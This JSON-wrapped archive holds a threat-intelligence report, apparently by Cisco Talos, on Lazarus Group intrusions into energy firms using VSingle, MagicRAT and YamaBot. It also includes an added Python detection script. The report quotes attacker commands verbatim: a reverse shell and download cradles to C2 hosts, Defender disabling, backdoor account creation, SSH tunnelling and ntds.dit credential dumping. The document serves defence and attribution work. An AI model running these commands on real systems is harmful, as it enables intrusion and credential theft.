{
	"id": "61c735bb-59d2-4f96-be84-427dae7b80db",
	"created_at": "2026-04-06T00:11:50.05931Z",
	"updated_at": "2026-04-10T03:38:19.91727Z",
	"deleted_at": null,
	"sha1_hash": "f25826652b1c6ec00e81e49eedbeb68475535d76",
	"title": "Lazarus and the tale of three RATs",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1275835,
	"plain_text": "Lazarus and the tale of three RATs\r\nBy Asheer Malhotra\r\nPublished: 2022-09-08 · Archived: 2026-04-05 18:23:39 UTC\r\nThursday, September 8, 2022 08:01\r\nCisco Talos has been tracking a new campaign operated by the Lazarus APT group, attributed to North Korea by\r\nthe United States government.\r\nThis campaign involved the exploitation of vulnerabilities in VMWare Horizon to gain an initial foothold into\r\ntargeted organizations.\r\nTargeted organizations include energy providers from around the world, including those headquartered in the\r\nUnited States, Canada and Japan.\r\nThe campaign is meant to infiltrate organizations around the world for establishing long term access and\r\nsubsequently exfiltrating data of interest to the adversary's nation-state.\r\nTalos has discovered the use of two known families of malware in these intrusions — VSingle and YamaBot.\r\nTalos has also discovered the use of a recently disclosed implant we're calling \"MagicRAT\" in this campaign.\r\nCisco Talos observed North Korean state-sponsored APT Lazarus Group conducting malicious activity between\r\nFebruary and July 2022. Lazarus has been previously attributed to the North Korean government by the U.S.\r\nCybersecurity and Infrastructure Security Agency (CISA). The entry vectors involve the successful exploitation of\r\nvulnerabilities in VMWare products to establish initial footholds into enterprise networks, followed by the deployment\r\nof the group's custom malware implants,VSingle and YamaBot. In addition to these known malware families, we have\r\nalso discovered the use of a previously unknown malware implant we're calling \"MagicRAT.\"\r\nThis campaign was previously partially disclosed by other security firms, but our findings reveal more details about the\r\nadversary's modus operandi. We have also observed an overlap of command and control (C2) and payload-hosting\r\ninfrastructure between our findings and the U.S. 
Cybersecurity and Infrastructure Security Agency's (CISA) June\r\nadvisory that detailed continued attempts from threat actors to compromise vulnerable VMWare Horizon servers.\r\nhttps://blog.talosintelligence.com/lazarus-three-rats/\r\nPage 1 of 25\n\nIn this research, we illustrate Lazarus Group's post-exploitation tactics, techniques and procedures (TTPs) to establish a\r\nfoothold, perform initial reconnaissance, deploy bespoke malware and move laterally across infected enterprises. We\r\nalso provide details about the activities performed by the attackers when the VSingle backdoor is instrumented on the\r\ninfected endpoints.\r\nIn this campaign, Lazarus was primarily targeting energy companies in Canada, the U.S. and Japan. The main goal of\r\nthese attacks was likely to establish long-term access into victim networks to conduct espionage operations in support\r\nof North Korean government objectives. This activity aligns with historical Lazarus intrusions targeting critical\r\ninfrastructure and energy companies to establish long-term access to siphon off proprietary intellectual property.\r\nAttribution\r\nCisco Talos assesses with high confidence these attacks have been conducted by the North Korean state-sponsored\r\nthreat actor Lazarus Group. During our investigations, we identified three distinct RATs being employed by the threat\r\nactors, including VSingle and YamaBot, which are exclusively developed and distributed by Lazarus. The Japanese\r\nCERT (JPCERT/CC) recently published reports (VSingle,YamaBot), describing them in detail and attributed the\r\ncampaigns to the Lazarus threat actor.\r\nThe TTPs used in these attacks also point to the Lazarus threat actor. The initial vector was the exploitation of the Log4j\r\nvulnerability on exposed VMware Horizon servers. Successful post-exploitation led to the download of their toolkit\r\nfrom web servers. 
The same initial vector, URL patterns and similar subsequent hands-on-keyboard activity have been\r\ndescribed in this report from AhnLab from earlier this year. There are also overlapping IOCs between the campaign\r\ndescribed by AhnLab and the current campaign, such as the IP address84[.]38.133[.]145, which was used as a hosting\r\nplatform for the actors' malicious tools. Although the same tactics have been applied in both attacks, the resulting\r\nmalware implants deployed have been distinct from one another, indicating the wide variety of implants available at the\r\ndisposal of Lazarus. Additionally, we've also observed similarities in TTPs disclosed by Kaspersky attributed to the\r\nAndariel sub-group under the Lazarus umbrella, with the critical difference being the deployment of distinct malware.\r\nWhile Kaspersky discovered the use of Dtrack and Maui, we've observed the use of VSingle, YamaBot and MagicRAT.\r\nhttps://blog.talosintelligence.com/lazarus-three-rats/\r\nPage 2 of 25\n\nCisco Talos acknowledges that when analyzed individually, the attribution evidence only reaches medium-confidence,\r\nhowever, we're raising our confidence level when analyzing all these points in the context of the campaign and victims.\r\nCampaign\r\nCisco Talos has observed several attacks targeting multiple victims. In this section, we detail two specific attack\r\ninstances that we assess have been the most representative of the playbooks employed by Lazarus in this campaign:\r\nVictim 1: Illustrates the kill chain from exploitation to actions on objectives. 
This intrusion also illustrates the\r\nuse of the VSingle implant.\r\nVictim 2: Represents a kill chain similar to Victim 1 but in this instance, we observed the deployment of a new\r\nimplant we're calling \"MagicRAT\" along with VSingle.\r\nA third intrusion set worth noting here is one where we saw the use of a third bespoke implant known as YamaBot.\r\nYamaBot was recently disclosed and attributed to the Lazarus APT by the Japan Computer Emergency Response Team\r\nCoordination Center (JPCERT/CC).\r\nVictim No. 1: VSingle and beyond\r\nIn the case of the first victim, we observed the exploitation of publicly known vulnerabilities to ultimately deploy the\r\nVSingle backdoor on infected endpoints to establish long-term access.\r\nIn this specific instance, we also observed the actual instrumentation of VSingle implants to carry out additional\r\nmalicious activities on the infected systems. The original post summarizes the attacker's playbook in a flow diagram (not reproduced in this archive); each step is detailed in the sections ahead.\r\nExploitation and foothold\r\nCisco Talos identified the exploitation of the Log4Shell vulnerability on public-facing VMware Horizon servers as the\r\ninitial attack vector [T1190]. The compromise is followed by a series of activities to establish a foothold [TA0001] on\r\nthe systems before the attackers deploy additional malware and move laterally across the network. During our\r\ninvestigation, we discovered two different foothold payloads. 
In the first, the attackers abuse node.exe, which ships with VMware Horizon, to execute the one-liner node.exe script below (-r preloads the net module, -e evaluates the inline script):\r\nC:\"Program Files\"\\VMware\"VMware View\"\\Server\\appblastgateway\\node.exe -r net -e \"sh = require('child_process').exec('cmd.exe');var client = new net.Socket();client.connect(\u003cPort\u003e, '\u003cC2_IP\u003e', function() {client.pipe(sh.stdin);sh.stdout.pipe(client);sh.stderr.pipe(client);});\"\r\nThis opens an interactive reverse shell: cmd.exe's stdin, stdout and stderr are piped over a TCP socket to the C2, so the attackers can issue arbitrary commands on the infected entry endpoint.\r\nIn another instance, we observed the attackers exploiting vulnerabilities in VMware to launch custom PowerShell\r\nscripts on the infected endpoint via VMware's ws_ConnectionServer.exe:\r\npowershell -exec bypass IEX (New-Object Net.WebClient).DownloadString('http://\u003cremote_location\u003e/\u003cfilename\u003e.ps1')\r\nSince VMware Horizon runs with administrator privileges, the attacker doesn't have to worry about elevating\r\ntheir privileges; a shell spawned from the Horizon process inherits them.\r\nAfter the interactive shell is established, the attackers perform a preliminary reconnaissance on the endpoint to get\r\nnetwork information and directory listings [T1083], [T1590], [T1518]:\r\nipconfig /all\r\ndir c:\"Program Files (x86)\r\ndir c:\"Program Files\r\nThe next step is the deactivation of the Windows Defender components [T1562]. This is done through registry key\r\nchanges, WMIC commands and PowerShell commands. 
The list below contains the full list of methods Cisco Talos\r\nobserved.\r\npowershell -exec bypass -Command Get-MpPreference\r\npowershell.exe -ExecutionPolicy Bypass -command Set-MpPreference -DisableRealtimeMonitoring $true\r\nreg query HKEY_LOCAL_MACHINE\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows Defender\\\\Real-Time\r\nProtection /s /f DisableRealtimeMonitoring\r\nOnce the AV on the system has been bypassed using the reverse shell, the attackers then deploy the actual malware\r\nimplant from a malware family known to be developed and operated by Lazarus called \"VSingle.\"\r\nThe deployment consists of downloading a copy of the legitimate WinRAR utility from a remote location controlled by\r\nthe attackers along with an additional payload (archive) [T1608]:\r\npowershell -exec bypass -command (New-Object\r\nSystem.Net.WebClient).DownloadFile('\u003cremote_location\u003e\\\\rar.tmp', '\u003clocal_path\u003e\\\\rar.exe')\r\npowershell -exec bypass -command (New-Object\r\nSystem.Net.WebClient).DownloadFile('\u003cremote_location\u003e\\\\update.tmp \u003clocal_path\u003e\\\\java.tmp')\r\n\u003clocal_path\u003e\\\\rar.exe e \u003clocal_path\u003e\\\\java.tmp \u003clocal_path_2\u003e -hp!no!\r\nThe archive downloaded to the infected endpoint is decompressed and consists of the VSingle malware executable\r\nwhich is optionally renamed and then persisted on the endpoint by creating an auto-start service.\r\nHow is VSingle used?\r\nOur investigations led to the discovery of commands fed to the VSingle backdoor by the attackers to carry out a variety\r\nof activities such as reconnaissance, exfiltration and manual backdooring.\r\nThe actor starts by performing additional reconnaissance tasks by running the commands below [T1083], [T1590].\r\nhttps://blog.talosintelligence.com/lazarus-three-rats/\r\nPage 6 of 25\n\nCommand Intent\r\nsysteminfo \u0026 ipconfig /all \u0026 netstat -naop tcp \u0026 tasklist \u0026 net user \u0026 net view \u0026\r\narp -a\r\nSystem 
Information\r\nDiscovery [T1082]\r\nquery user\r\nSystem Information\r\nDiscovery [T1082]\r\nwhoami\r\nSystem Information\r\nDiscovery [T1082]\r\ndir /a %appdata%\\microsoft\r\nSystem Information\r\nDiscovery [T1082]\r\ndir /a C:\\Windows\\system32\\config\\systemprofile\\AppData\\Roaming\\microsoft\r\ncmd.exe /u /c dir /a c:\\users\\administrator\r\nSystem Information\r\nDiscovery [T1082]\r\ncmd /C pwd\r\ncmd /C dir\r\ncmd /C cd c:\\\\Users\\\\\u003cusername\u003e\\Download \u0026 dir\r\ncmd /C cd c:\\\\Users\\\\\u003cusername\u003e\\Downloads \u0026 dir\r\ncmd /C cd c:\\\\Users\\\\\u003cusername\u003e \u0026 dir\r\ncmd /C cd c: \u0026 dir\r\ncmd /C tree c:\\\\Users\r\nSystem Information\r\nDiscovery [T1082]\r\ncmd.exe /u /c time /t\r\ncmd.exe /u /c query session\r\nSystem Information\r\nDiscovery [T1082]\r\nThese commands will give the operators a solid understanding of the system they are in, including the installed\r\nsoftware, network configuration and system users, among other things. 
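The foothold chain described above (node.exe reverse shell or PowerShell download cradle, Defender tampering, password-protected RAR extraction, then a burst of discovery commands) can be stated as command-line detection logic. The Python below is an added example written for this page, not code from Cisco Talos or from the report. The sample command lines are constructed stand-ins modelled on the ones above: the 203.0.113.9 host, port 4444, the public-profile paths and the benign notepad line are invented, and the rule names and ATT&CK mappings are this example's own. It matches on lowercase tokens that survive path and host variation (set-mppreference, child_process, -hp) rather than on the exact strings observed, so it can be pointed at real Sysmon or EDR process-creation command lines.

```python
# Added example for this page (not code from the Talos report): classify
# process command lines against the foothold playbook described above.
# Matching is on lowercase tokens that survive path/host variation.

B = chr(92)  # backslash, built this way so the sample strings need no escape sequences
Q = chr(39)  # single quote, same reason

# Constructed sample, modelled on the Victim 1 chain. 203.0.113.9 is an
# RFC 5737 documentation address; port, paths and the benign line are invented.
SAMPLE_CMDLINES = [
    f'C:{B}Program Files{B}VMware{B}VMware View{B}Server{B}appblastgateway{B}node.exe -r net -e '
    f'sh = require({Q}child_process{Q}).exec({Q}cmd.exe{Q});var client = new net.Socket();'
    f'client.connect(4444, {Q}203.0.113.9{Q}, function() ...',
    f'powershell -exec bypass IEX (New-Object Net.WebClient).DownloadString({Q}http://203.0.113.9/a.ps1{Q})',
    'ipconfig /all',
    'powershell -exec bypass -Command Get-MpPreference',
    'powershell.exe -ExecutionPolicy Bypass -command Set-MpPreference -DisableRealtimeMonitoring $true',
    f'reg query HKEY_LOCAL_MACHINE{B}SOFTWARE{B}Policies{B}Microsoft{B}Windows Defender{B}Real-Time Protection /s /f DisableRealtimeMonitoring',
    f'powershell -exec bypass -command (New-Object System.Net.WebClient).DownloadFile({Q}http://203.0.113.9/rar.tmp{Q}, {Q}C:{B}Users{B}Public{B}rar.exe{Q})',
    f'C:{B}Users{B}Public{B}rar.exe e C:{B}Users{B}Public{B}java.tmp C:{B}Users{B}Public{B}out -hp!no!',
    'systeminfo & ipconfig /all & netstat -naop tcp & tasklist & net user & net view & arp -a',
    'notepad.exe readme.txt',  # benign control line
]

DISCOVERY_TOKENS = ('systeminfo', 'ipconfig', 'netstat', 'tasklist', 'net user', 'net view', 'arp -a')

# (rule name, ATT&CK id, predicate over the lowercased command line); mappings are this example's own
RULES = [
    ('node.exe reverse shell', 'T1059.007',
     lambda c: 'node.exe' in c and ' -e ' in c and 'child_process' in c and 'net.socket' in c),
    ('PowerShell download cradle', 'T1105',
     lambda c: 'powershell' in c and ('downloadstring' in c or 'downloadfile' in c)),
    ('Defender configuration queried', 'T1518.001',
     lambda c: 'get-mppreference' in c),
    ('Defender real-time monitoring disabled', 'T1562.001',
     lambda c: 'set-mppreference' in c and 'disablerealtimemonitoring' in c and '$true' in c),
    ('Defender policy probed in registry', 'T1518.001',
     lambda c: 'reg query' in c and 'windows defender' in c),
    ('password-protected RAR extraction', 'T1140',
     lambda c: 'rar.exe' in c and ' e ' in c and ' -hp' in c),
    ('chained discovery commands', 'T1082',
     lambda c: sum(tok in c for tok in DISCOVERY_TOKENS) >= 4),
]


def triage(cmdlines):
    '''Return [(index, rule_name, attack_id)] for every rule each line trips.'''
    hits = []
    for i, raw in enumerate(cmdlines):
        c = raw.lower()
        hits.extend((i, name, tid) for name, tid, pred in RULES if pred(c))
    return hits


def looks_like_foothold_chain(hits):
    '''True when an entry vector, Defender tampering and payload extraction all
    appear, which is the order of operations the report describes for Victim 1.'''
    seen = {name for _, name, _ in hits}
    entry = bool(seen & {'node.exe reverse shell', 'PowerShell download cradle'})
    return (entry
            and 'Defender real-time monitoring disabled' in seen
            and 'password-protected RAR extraction' in seen)


if __name__ == '__main__':
    hits = triage(SAMPLE_CMDLINES)
    for i, name, tid in hits:
        print(f'[{tid}] line {i}: {name}')
    print('foothold chain seen:', looks_like_foothold_chain(hits))
```

Individually, several of these rules are noisy (administrators do run Get-MpPreference and ipconfig); the value is in looks_like_foothold_chain, which only fires when an entry vector, Defender tampering and a password-protected extraction are all seen on the same host, the sequence the report attributes to the operators.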
This kind of information is crucial to preparing\r\nfor lateral movement activities.\r\nThe attackers also force the system to cache credentials so that it is possible to harvest them afterward [T1003/005].\r\nreg add HKLM\\SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest /v UseLogonCredential /t\r\nREG_DWORD /d 1 /f\r\nThe other configuration changes made to the victim host are intended to provide the attackers with their own admin-level users [T1136].\r\nCommand Intent\r\ncmd.exe /u /c net user \u003cuserid\u003e \u003cpassword\u003e /add Create user\r\ncmd.exe /u /c reg add HKLM\\software\\microsoft\\windows\r\nnt\\currentversion\\winlogon\\specialaccounts\\userlist /v \u003cusername\u003e /t REG_DWORD /d 0 /f\r\nAdd\r\nprivileges\r\ncmd.exe /u /c net localgroup Administrators /add \u003cusername\u003e\r\ncmd.exe /u /c net localgroup Remote Desktop Users /add \u003cusername\u003e\r\nAdd\r\nprivileges\r\nhttps://blog.talosintelligence.com/lazarus-three-rats/\r\nPage 7 of 25\n\nCommand Intent\r\ncmd.exe /u /c net localgroup Administrateur /add \u003cusername\u003e\r\ncmd.exe /u /c net localgroup Administrateurs /add \u003cusername\u003e\r\nAdd\r\nprivileges\r\ncmd.exe /u /c reg add HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon /v\r\nAllowMultipleTSSessions /t REG_DWORD /d 1 /f\r\nSystem\r\nconfig -\r\nAllow\r\nmultiple\r\nsessions\r\ncmd.exe /u /c reg add\r\nHKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\r\n/v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f\r\nSystem\r\nconfig -\r\ndisable UAC\r\ncmd.exe /u /c reg add HKEY_LOCAL_MACHINE\\System\\CurrentControlSet\\Control\\Lsa /v\r\nLmCompatibilityLevel /t REG_DWORD /d 0 /f\r\nSystem\r\nconfig - LAN\r\nMan\r\ncompatibility\r\nThese could be used if the RAT is detected/removed or even provide the actors with an RDP access, avoiding the use of\r\na malicious tool.\r\nWith VSingle in place, the attackers can access other systems with the help of 
two additional tools.\r\npvhost.tmp renamed to pvhost.exe, which is actually plink.exe, the command-line SSH client from PuTTY that can create SSH tunnels\r\nbetween systems.\r\nosc.tmp renamed to osc.exe, which we assess with high confidence is 3proxy. Unfortunately, Cisco Talos could\r\nnot obtain a copy of the file.\r\nThese two tools working together create a proxy on the victim system which has its listening port \"exported\" to a port\r\non a remote host. This mechanism allows the attacker to have a local proxy port that gives access to the victim network\r\nas if the attacker's box was on it directly.\r\nFirst, the attackers start osc.exe (3proxy) to listen on a loopback port (in this example, we chose 8118), with the\r\ncommand below.\r\nC:\\Windows\\system32\\config\\systemprofile\\AppData\\Roaming\\microsoft\\osc.exe -i127.0.0.1 -p8118\r\nBecause the proxy binds only to 127.0.0.1, this alone wouldn't help the attackers: they need port 8118 reachable from their own network. So they created an SSH tunnel using Plink with a remote port forward to a server controlled by the attackers:\r\nC:\\Windows\\system32\\config\\systemprofile\\AppData\\Roaming\\microsoft\\pvhost.exe -N -R 18118:127.0.0.1:8118 -P [Port] -l [username] -pw [password] \u003cRemote_IP\u003e\r\nThe -R option makes the attacker's SSH server listen on port 18118 and relays every connection it receives back through the tunnel to 127.0.0.1:8118 on the victim, i.e. to the 3proxy listener; -N opens no remote shell, -P selects the SSH port, and -pw supplies the password on the command line, which leaves it visible in process command-line telemetry.\r\nVSingle RAT Analysis\r\nThe VSingle loader executable is an MFC-based backdoor that consists of multiple layers. The first is responsible for\r\ndecoding and executing the next layer (layer 2), a shellcode in the memory of the implant process. The shellcode is\r\nsimply an injector for the next layer (layer 3, also shellcode). 
The implant spawns a new \"explorer.exe\" process and\r\ninjects shellcode (layer 3) into it for execution.\r\nThe layer 3 shellcode is injected into a newly spawned benign process, such as explorer.exe, which consists of decoding\r\nanother layer (layer 4) of shellcode that is then executed in the benign process.\r\nLayer 4 is the actual VSingle implant DLL loaded reflectively into the memory of the benign process.\r\nThe implant is simple in terms of functionalities and is basically a stager that enables the attackers to deploy more\r\nmalware on the infected system. It also includes the ability to open a reverse shell that connects to the C2 server and\r\nallows untethered access to the attackers to the endpoint to execute commands via \"cmd.exe.\"\r\nAlthough a rather simple RAT, VSingle can download and execute additional plugins from the C2 server. These plugins\r\ncan either be in the form of shellcode or script files of specific formats served by the C2. The image below shows the\r\ncode used to execute a shellcode downloaded.\r\nhttps://blog.talosintelligence.com/lazarus-three-rats/\r\nPage 9 of 25\n\nIn-memory shellcode execution by the implant.\r\nFor simpler cases, the implant can receive executables or scripts, save them into a file in the%temp%directory and\r\nexecute them on the endpoint. The implant supports the .vbs, .bat and .tmp files, since all of them are executed through\r\n\"cmd /c.\" The .tmp files can also be loaded as executables (.exe).\r\nThe implant can achieve persistence for malware artifacts served and specified by the C2 server. 
The simpler\r\nmechanism is the creation of a file in the Startup folders, which is done in two different locations:\r\nc:\\Documents and Settings\\%s\\Start Menu\\Programs\\Startup\\%s\r\n%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\\r\nAdditionally, there are three other ways available, all of which use the \"cmd.exe /c\" command, that the VSingle\r\noperators can use:\r\nCommand Intent\r\nsc create \"%s\" DisplayName= \"%s\" type= own type= interact start= auto error=\r\nignore binpath= \"cmd.exe /k start \\\"\\\" \\\"%s\\\"\r\nAuto start Service Creation\r\n[T1543/003]\r\nreg add HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\ /v \"%s\" /t\r\nREG_SZ /d \"%s\" /f\r\nRun registry key [T1547/001]\r\nschTasks /Create /F /TN \"%s\" /TR \"%s\" /SC onlogon\r\nScheduled task triggered at\r\nlogon [T1053/005]\r\nschtasks /create /tn \u003ctask_name\u003e /tr C:\\\\Windows\\\\upsvc.exe /sc onstart /ru\r\nSystem /rl highest /f\r\nScheduled task triggered at\r\nsystem start with high priority\r\n[T1053/005]\r\nhttps://blog.talosintelligence.com/lazarus-three-rats/\r\nPage 10 of 25\n\nVictim No. 2: The discovery of MagicRAT\r\nIn another victim's network, we saw a similar chain of events: initial recon followed by disabling the AV software and\r\nthe deployment of a bespoke implant. We also observed successful lateral movement into other endpoints in the\r\nenterprise.\r\nWhat's unique in this intrusion, however, is that we observed the deployment of a fairly new implant three days before\r\nthe attackers deployed VSingle on the infected systems.\r\nThis implant called \"MagicRAT\" is outlined in a recently published post. The reverse interactive shell eventually\r\ndownloads MagicRAT from a remote location.\r\nMagicRAT Analysis\r\nIn this campaign, MagicRAT was configured with a different configuration file and path. It also reported to different C2\r\nservers. 
The configuration directory is now called \"MagicMon\" in the current user's \"AppData\\Roaming\" directory. As\r\nseen in the screenshot below, this folder creates and hosts an initialization file named \"MagicSystem.ini.\" This INI file\r\ncontains several configurations including the list of C2 URLs that can be used by the implant to send and receive\r\ncommands and data.\r\nINI file containing the list of base64 encoded C2 URLs.\r\nhttps://blog.talosintelligence.com/lazarus-three-rats/\r\nPage 11 of 25\n\nLateral Movement\r\nDuring the first few days after the successful initial access, the attackers conducted limited reconnaissance of the\r\nendpoint and deployed two different malware families MagicRAT and VSingle on the infected endpoint to maintain\r\ncovert access to the system. Just like with the first victim, the attackers then started to perform Active Directory (AD)\r\nrelated explorations (via impacket and VSingle) to identify potential endpoints to laterally move into. The table below\r\nillustrates the commands executed to perform such actions.\r\nCommand Intent\r\npowershell.exe Get-NetUser 1\u003e \\\\127.0.0.1\\ADMIN$\\\u003cimpacket_log_file\u003e 2\u003e\u00261 User Discovery [T1033]\r\npowershell.exe Get-ADDomain 1\u003e \\\\127.0.0.1\\ADMIN$\\\u003cimpacket_log_file\u003e\r\n2\u003e\u00261\r\nAccount/Domain Discovery\r\n[T1087]\r\npowershell.exe Get-ADUser \u003cserver\u003e -Properties * 1\u003e \\\\127.0.0.1\\ADMIN$\\\r\n\u003cimpacket_log_file\u003e 2\u003e\u00261\r\nUser Discovery [T1033]\r\npowershell.exe Get-ADUser -Filter * 1\u003e \\\\127.0.0.1\\ADMIN$\\\r\n\u003cimpacket_log_file\u003e 2\u003e\u00261\r\nUser Discovery [T1033]\r\npowershell.exe Get-ADGroup -filter * 1\u003e \\\\127.0.0.1\\ADMIN$\\\r\n\u003cimpacket_log_file\u003e 2\u003e\u00261\r\nAccount/Domain Discovery\r\n[T1087]\r\npowershell.exe Get-AdComputer -filter * 1\u003e \\\\127.0.0.1\\ADMIN$\\\r\n\u003cimpacket_log_file\u003e 2\u003e\u00261\r\nSystem 
Information\r\nDiscovery [T1082]\r\npowershell.exe Get-ADComputer -filter {OperatingSystem -Like '*Windows\r\n10*'} -property * | select name, operatingsystem\r\nSystem Information\r\nDiscovery [T1082]\r\nnslookup \u003cremote_computername\u003e\r\nAccount/Domain Discovery\r\n[T1087]\r\npowershell.exe Get-WMIObject -Class win32_operatingsystem -Computername\r\n\u003cremote_computername\u003e\r\nSystem Information\r\nDiscovery [T1082]\r\npowershell.exe Get-ADUser -Filter * | Select SamAccountName User Discovery [T1033]\r\npowershell.exe Get-AdUser -Filter * -Properties * | Select Name, logonCount User Discovery [T1033]\r\npowershell.exe Get-AdComputer -Filter * -Properties * | select Name,\r\nLastLogonDate, lastLogon, IPv4Address\r\nAccount/Domain Discovery\r\n[T1087]\r\nOnce the list of computers and users is obtained, the attackers would manually ping specific endpoints in the list to\r\nverify if they are reachable (with an occasional tracert). VSingle deployment on new hosts was done by using WMIC to\r\nstart a remote process. This process was, in fact, a PowerShell snippet that would download VSingle from a remote\r\nsystem [T1608/001].\r\nWMIC /node:\u003cComputer_Name\u003e process call create \"powershell.exe (New-Object\r\nSystem.Net.Webclient).DownloadFile('\u003cremote_location\u003e/svhostw.exe','\u003clocal_path\u003e\\\\svhostww.exe')\"\r\nhttps://blog.talosintelligence.com/lazarus-three-rats/\r\nPage 12 of 25\n\nIn some infections, we observed the deployment of impacket tools on other endpoints to move laterally and establish an\r\ninteractive shell.\r\nThis stage of the attacks was clearly manual work performed by a human operator. 
While trying to establish interactive\r\nremote console sessions, we can see the operators making errors on the commands.\r\nTry # Command Result\r\n1 Enter-PSSession \u003cComputerName\u003e Failed attempt\r\n2 Enter-PSSession Failed attempt\r\n3 powershell.exe Enter-PSSession Correct command\r\nThe attackers typically take their time to explore the infected system by obtaining file listings of multiple directories of\r\ninterest to them. When files of particular interest are found they are put into a .rar archive for exfiltration, typically via\r\none of the custom-developed implants running on the system.\r\nVictim No. 3: VSingle makes way for YamaBot\r\nDuring one particular intrusion, the attackers first deployed VSingle on the endpoint. However, after the VSingle\r\nsample was detected, the attackers were at risk of losing access to the enterprise. Therefore, after repeated failed\r\nattempts to deploy VSingle on the endpoints, the attackers then deployed another updated copy of VSingle. After\r\nmaintaining continued access for a while, the attackers then moved on to the use of another implant — YamaBot.\r\nYamaBot is a custom-made GoLang-based malware family. It uses HTTP to communicate with its C2 servers. 
It\r\ntypically begins by sending preliminary system information about the infected endpoint to the C2: computer name,\r\nusername and MAC address.\r\nhttps://blog.talosintelligence.com/lazarus-three-rats/\r\nPage 13 of 25\n\nYamaBot's helper function names.\r\nThis implant has standard RAT capabilities, including the ability to:\r\nList files and directories.\r\nSend process information to C2.\r\nDownload files from remote locations.\r\nExecute arbitrary commands on the endpoints.\r\nUninstall itself.\r\nYamaBot was recently attributed to the Lazarus APT group by JPCERT who provided an excellent analysis of the\r\nimplant.\r\nCredential Harvesting\r\nApart from the usual recon and deployment of the custom implants, we also observed Lazarus' use of completely\r\ndifferent TTPs for credential harvesting. The attackers created backups of volumes that were then used to create a copy\r\nhttps://blog.talosintelligence.com/lazarus-three-rats/\r\nPage 14 of 25\n\nof the \"ntds.dit\" file for exfiltration containing Active Directory data.\r\nCommand Intent\r\nvssadmin list shadows /for=C: ^\u003e \u003clocal_path\u003e\\\u003clog_file\u003e \u003e \u003clocal_path\u003e\\execute.bat \u0026\r\nC:\\Windows\\system32\\cmd.exe /Q /c \u003clocal_path\u003e\\execute.bat \u0026 del \u003clocal_path\u003e\\execute.bat\r\nSystem\r\nInformation\r\nDiscovery\r\n[T1082]\r\nvssadmin create shadow /For=C: ^\u003e \u003clocal_path\u003e\\\u003clog_file\u003e \u003e \u003clocal_path\u003e\\execute.bat \u0026\r\nC:\\Windows\\system32\\cmd.exe /Q /c \u003clocal_path\u003e\\execute.bat \u0026 del \u003clocal_path\u003e\\execute.bat\r\nOS Credential\r\nDumping:\r\nNTDS\r\n[T1003/003]\r\ncmd.exe /C copy \\\\?\r\n\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy1\\Windows\\NTDS\\ntds.dit\r\n\u003clocal_path\u003e\\phPzFvOU.tmp ^\u003e \u003clocal_path\u003e\\\u003clog_file\u003e \u003e \u003clocal_path\u003e\\execute.bat \u0026\r\nC:\\Windows\\system32\\cmd.exe /Q /c 
\u003clocal_path\u003e\\execute.bat \u0026 del \u003clocal_path\u003e\\execute.bat\r\nOS Credential\r\nDumping:\r\nNTDS\r\n[T1003/003]\r\nThe Variations in the playbook\r\nThe overall structure of the infection chains remained the same across multiple intrusions in this campaign, primarily\r\nconsisting of the cyber kill chain that we illustrated at the beginning of the campaign section.\r\nHowever, there were some key variations that consist of some optional activities conducted by the adversary in different\r\nintrusion sets. These variations include the use of:\r\nCredential harvesting using tools such as Mimikatz and Procdump.\r\nProxy tools to set up SOCKs proxies.\r\nReverse tunneling tools such as PuTTY's plink.\r\nIt is therefore necessary to list all the TTPs used by the adversary across all the intrusions we've discovered in this\r\ncampaign. This section provides an additional list of TTPs and commands used by the operators along with their\r\ncorresponding MITRE ATT\u0026CK IDs to help defenders better understand this APT's offensive playbook.\r\nNote: There is some overlap between operations (common or similar commands) carried out via the reverse shell, the\r\nVSingle RAT and impacket tools. This could be because there might be multiple human operators manually executing\r\ntheir own set of commands based on their shift days and timings (without proper handover of information collected and\r\npercolated from one operator to another).\r\nFor example, in one instance, the attackers tried to obtain Active Directory information on one endpoint via PowerShell\r\ncmdlets. 
However, a day later, the attackers used adfind.exe to extract similar information on the same endpoint.\r\nDisabling AV components\r\nThe threat actors used multiple variations of commands to query information about the installed antivirus software on\r\nthe endpoints, followed by disabling the Windows Defender antivirus.\r\nCommand -> Intent\r\ncmd /C wmic /Node:localhost /Namespace:\\\\root\\SecurityCenter2 Path AntiVirusProduct Get displayname -> Security Software Discovery [T1518/001]\r\nwmic /namespace:\\\\root\\SecurityCenter2 path AntiVirusProduct get /format:list -> Security Software Discovery [T1518/001]\r\ncmd.exe /Q /c wmic /namespace:\\\\root\\securitycenter2 path antivirusproduct GET displayName, productState, pathToSignedProductExe 1\u003e \\\\127.0.0.1\\ADMIN$\\\u003clog_file_name\u003e 2\u003e\u00261 -> Security Software Discovery [T1518/001]\r\ncmd.exe /c powershell -exec bypass -Command Get-MpPreference -> Security Software Discovery [T1518/001]\r\npowershell.exe -ExecutionPolicy Bypass -command Set-MpPreference -DisableRealtimeMonitoring $true -> Impair Defenses [T1562/001]\r\nreg query HKEY_LOCAL_MACHINE\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows Defender\\\\Real-Time Protection /s /f DisableRealtimeMonitoring -> Impair Defenses [T1562/001]\r\npowershell -exec bypass -Command Set-MpPreference -SubmitSamplesConsent NeverSend -> Impair Defenses [T1562/001]\r\npowershell -exec bypass -Command Set-MpPreference -MAPSReporting Disable -> Impair Defenses [T1562/001]\r\ncmd.exe /c reg add HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows Defender /v DisableAntiSpyWare /t REG_DWORD /d 1 -> Impair Defenses [T1562/001]\r\nReconnaissance\r\nDuring the reconnaissance and credential harvesting stage, the attackers gather information about the system, the\r\nnetwork, including the domain, and the installed software. 
